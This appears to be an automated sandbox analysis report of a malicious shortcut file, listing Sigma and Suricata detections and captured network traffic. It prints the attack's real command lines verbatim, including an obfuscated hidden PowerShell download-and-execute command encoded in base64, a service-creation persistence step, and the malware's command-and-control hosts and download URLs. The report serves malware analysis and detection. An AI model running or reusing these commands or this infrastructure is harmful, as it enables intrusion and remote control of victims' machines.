        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , CommandLine|base64offset|contains: H, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 980, ParentProcessName: cmd.exe, ProcessCommandLine: SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto , ProcessId: 1932, ProcessName: sc.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , CommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , CommandLine|base64offset|contains: >., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /v /k "S^T^aR^T /M^I^n "" P^oWer^s^H^eL^l -W H^iDde^n -No^l^OGO -N^o^p -ep B^YPA^sS -eN^c^oDe^d^cOmMAn^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA="" && exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3200, ParentProcessName: cmd.exe, ProcessCommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , ProcessId: 2012, ProcessName: powershell.exe
        Sigma detected: Office Macro File Creation
        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 6580, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
        Sigma detected: SC.EXE Query Execution
        Source: Process startedAuthor: frack113: Data: Command: sc query myRdpService, CommandLine: sc query myRdpService, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "cmd.exe" /c sc query myRdpService, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3156, ParentProcessName: cmd.exe, ProcessCommandLine: sc query myRdpService, ProcessId: 8392, ProcessName: sc.exe
        Sigma detected: Start Windows Service Via Net.EXE
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net start "myRdpService", CommandLine: net start "myRdpService", CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 980, ParentProcessName: cmd.exe, ProcessCommandLine: net start "myRdpService", ProcessId: 1804, ProcessName: net.exe

        Data Obfuscation

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious location
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: PoWersHeLl -W HiDden -NolOGO -Nop -ep BYPAsS -eNcoDedcOmMAnd "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBDAG8AZABpAE4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIAaQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAHQAUgAiACkAKQApACkALgBDAG8ATgBUAGUATgB0ACkAKQA=" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2012, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vz2enilj\vz2enilj.cmdline", ProcessId: 6236, ProcessName: csc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-08T10:42:17.579945+010028109461A Network Trojan was detected104.21.86.219443192.168.11.2049738TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-08T10:42:16.847415+010028033053Unknown Traffic192.168.11.2049738104.21.86.219443TCP
        2024-11-08T10:43:05.095153+010028033053Unknown Traffic192.168.11.2049744104.21.86.219443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-08T10:40:53.549959+010028032742Potentially Bad Traffic192.168.11.2049715104.21.86.219443TCP
        2024-11-08T10:40:55.792835+010028032742Potentially Bad Traffic192.168.11.2049717104.21.86.219443TCP
        2024-11-08T10:40:57.872596+010028032742Potentially Bad Traffic192.168.11.2049719104.21.86.219443TCP
        2024-11-08T10:41:20.575030+010028032742Potentially Bad Traffic192.168.11.2049732104.21.86.219443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for dropped file
        Source: C:\Windows\Temp\svczHost.exeReversingLabs: Detection: 15%
        Multi AV Scanner detection for submitted file
        Source: U82W1yZAYQ.lnkReversingLabs: Detection: 15%
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
        Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.20:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.20:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.20:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.86.219:443 -> 192.168.11.20:49738 version: TLS 1.2
        Source: Binary string: m.pdb4yO source: powershell.exe, 0000000D.00000002.3418771818.00000226FB897000.00000004.00000020.00020000.00000000.sdmp

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2810946 - Severity 1 - ETPRO MALWARE Banload DLL Encoded Request : 104.21.86.219:443 -> 192.168.11.20:49738
        Potential dropper URLs found in powershell memory
        Source: powershell.exe, 00000008.00000002.2661526576.0000026921AFD000.00000004.00000020.00020000.00000000.sdmpString found in memory: <cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator>Administrator</dc:creator><cp:keywords></cp:keywords><dc:description></dc:description><cp:lastModifiedBy>Administrator</cp:lastModifiedBy><cp:revision>2</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2024-08-10T03:38:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-05T13:30:00Z</dcterms:modified></cp:coreProperties>
        Source: powershell.exe, 0000000D.00000002.3347031829.00000226F3C65000.00000004.00000800.00020000.00000000.sdmpString found in memory: <&nbsp;&nbsp;&nbsp;"><a href="http://style="float:left;concerned with the=http%3A%2F%2Fwww.in popular culturetype="text/css" />it is possible to Harvard Universitytylesheet" href="/the main characterOxford University name="keywords" cstyle="text-align:the United Kingdomfederal government<div style="margin depending on the description of the<div class="header.min.js"></script>destruction of theslightly differentin accordance withtelecommunicationsindicates that theshortly thereafterespecially in the European countriesHowever, there aresrc="http://staticsuggested that the" src="http://www.a large number of Telecommunications" rel="nofollow" tHoly Roman Emperoralmost exclusively" border="0" alt="Secretary of Stateculminating in theCIA World Factbookthe most importantanniversary of thestyle="background-<li><em><a href="/the Atlantic Oceanstrictly speaking,shortly before thedifferent types ofthe Ottoman Empire><img src="http://An Introduction toconsequence of thedeparture from theConfederate Statesindigenous peoplesProceedings of theinformation on thetheories have beeninvolvement in thedivided into threeadjacent countriesis responsible fordissolution of thecollaboration withwidely regarded ashis contemporariesfounding member ofDominican Republicgenerally acceptedthe possibility ofare also availableunder constructionrestoration of thethe general publicis almost entirelypasses through thehas been suggestedcomputer and videoGermanic languages according to the different from theshortly afterwardshref="https://www.recent developmentBoard of Directors<div class="search| <a href="http://In particular, theMultiple footnotesor other substancethousands of yearstranslation of the</div>
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 8008
        Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 8008
        Source: unknownNetwork traffic detected: HTTP traffic on port 8008 -> 49743
        Source: global trafficTCP traffic: 192.168.11.20:49740 -> 23.88.71.29:8000
        Source: global trafficTCP traffic: 192.168.11.20:49741 -> 206.206.126.252:8008
        Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/2 HTTP/1.1Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/55 HTTP/1.1Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: gAaGKh0eCkeJbn3l2H15uw==Sec-WebSocket-Version: 13
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: 6nDA5lCQpEGthEIDWcZn5Q==Sec-WebSocket-Version: 13
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: MBF424LYDUiZvTO48zfN7Q==Sec-WebSocket-Version: 13
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: 2u8wHEz9rUuF7BlOMAv9YQ==Sec-WebSocket-Version: 13
        Source: Joe Sandbox ViewIP Address: 104.21.86.219 104.21.86.219
        Source: Joe Sandbox ViewIP Address: 206.206.126.252 206.206.126.252
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49715 -> 104.21.86.219:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49717 -> 104.21.86.219:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49719 -> 104.21.86.219:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49732 -> 104.21.86.219:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49738 -> 104.21.86.219:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49744 -> 104.21.86.219:443
        Source: global trafficHTTP traffic detected: GET /KQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file3/f40ab6a53a650d71af6d58782cf944eb3bbe65ce71f776cf45ebb488d0de6ad04dd9da4d673c732c8da198bf177de048d268178a0b39d4d5ff3cc9ba1dea46b48fd52f3a309fb889c0f8b0d1fe17b088b9e4ad19e2c0ae1fc28a6029fc7cf0ec/Windows%20Defender/16/16/user/197 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211831a2f0a5c8263bf9f8f811f60dc99699 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
        Source: global trafficHTTP traffic detected: GET /file2/c6ae6756346c38969223ba2f8fc7c40738b6e97509be44a06793b0d51b847db1091341c2988cbc2948325b3d5107ab6c121c54393a4d1151e59a1757a8ed15e97d729c9eb010734e1d9643144208f8d481d97ea13050ba135c180aa98783c1f89d259370e7f69ec234172a1fc1dd60bf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c793735a86345f43847747bb26eb6681 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
        Source: global trafficHTTP traffic detected: GET /file2/211ffceba97c49c33c18b8f61c4b0441273eed18f1e2ef7d812789867755b3eb28b278eca426bd46417002fbcc64cded32eac1b1c9c1678c0981e7db20168094e80bda585ade9e496529eb1768f5a9ca258534cb9a9736b2e5428ee241bddef5ff3e3f58581d305b1fc9fef007d79231 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d33c6501877cd68703625ec3375 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 85
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d33c6501877cd68703625ec3375 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 86
        Source: global trafficHTTP traffic detected: GET /file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e2962291528d4a91f7de007736d3e869533e8ac791d776d249137edcf1b9b5f94cc9d5f29e8e79927784ba6e51196374f4288c79ddab7570b96946bdaadd59ccadec0a22e27ea0a0592f1b7a24bc844a7199b7ee8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118a9258d33c6501877cd68703625ec3375 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 62
        Source: global trafficHTTP traffic detected: GET /file2/0fdaa038ad6c2eea45102e7ca9fa4167858efe9d7995f0cf42f1da8090402cefc2554dddacd02abc7f91da6751ccce90dd4887b116455e49be81db10f80baa11a424f005d6dbdad754876d59e5f460b1c4ffba9cdd1a4c397055a028e02621e6d4ce144e0fe818b70e621c9f4f876791 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 140
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 69
        Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec469e8a8f676c6e21bae43b153c3c581617ac552ec76819a08497356d4a4c1300c247665707c23d7ea2e5505405a37bf7431b8ca2fa35ffb67331141bd33177e82cf02229073ebb7c61d4ae688cf4c9aa3e8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 200
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 97
        Source: global trafficHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118677f201494fef54afd7d17ea9687f9c9 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 64
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownTCP traffic detected without corresponding DNS query: 206.206.126.252
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /KQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file3/f40ab6a53a650d71af6d58782cf944eb3bbe65ce71f776cf45ebb488d0de6ad04dd9da4d673c732c8da198bf177de048d268178a0b39d4d5ff3cc9ba1dea46b48fd52f3a309fb889c0f8b0d1fe17b088b9e4ad19e2c0ae1fc28a6029fc7cf0ec/Windows%20Defender/16/16/user/197 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /file2/c6ae6756346c38969223ba2f8fc7c40738b6e97509be44a06793b0d51b847db1091341c2988cbc2948325b3d5107ab6c121c54393a4d1151e59a1757a8ed15e97d729c9eb010734e1d9643144208f8d481d97ea13050ba135c180aa98783c1f89d259370e7f69ec234172a1fc1dd60bf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /file2/211ffceba97c49c33c18b8f61c4b0441273eed18f1e2ef7d812789867755b3eb28b278eca426bd46417002fbcc64cded32eac1b1c9c1678c0981e7db20168094e80bda585ade9e496529eb1768f5a9ca258534cb9a9736b2e5428ee241bddef5ff3e3f58581d305b1fc9fef007d79231 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /file2/4c4ffc93c89dfb9b826b1b24bd745331d0c2aafb3bfb560c0ae79c0e2962291528d4a91f7de007736d3e869533e8ac791d776d249137edcf1b9b5f94cc9d5f29e8e79927784ba6e51196374f4288c79ddab7570b96946bdaadd59ccadec0a22e27ea0a0592f1b7a24bc844a7199b7ee8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file2/0fdaa038ad6c2eea45102e7ca9fa4167858efe9d7995f0cf42f1da8090402cefc2554dddacd02abc7f91da6751ccce90dd4887b116455e49be81db10f80baa11a424f005d6dbdad754876d59e5f460b1c4ffba9cdd1a4c397055a028e02621e6d4ce144e0fe818b70e621c9f4f876791 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec469e8a8f676c6e21bae43b153c3c581617ac552ec76819a08497356d4a4c1300c247665707c23d7ea2e5505405a37bf7431b8ca2fa35ffb67331141bd33177e82cf02229073ebb7c61d4ae688cf4c9aa3e8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/2 HTTP/1.1Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/55 HTTP/1.1Host: uyt1n8ded9fb380.com
        Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: uyt1n8ded9fb380.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: gAaGKh0eCkeJbn3l2H15uw==Sec-WebSocket-Version: 13
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: 6nDA5lCQpEGthEIDWcZn5Q==Sec-WebSocket-Version: 13
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: MBF424LYDUiZvTO48zfN7Q==Sec-WebSocket-Version: 13
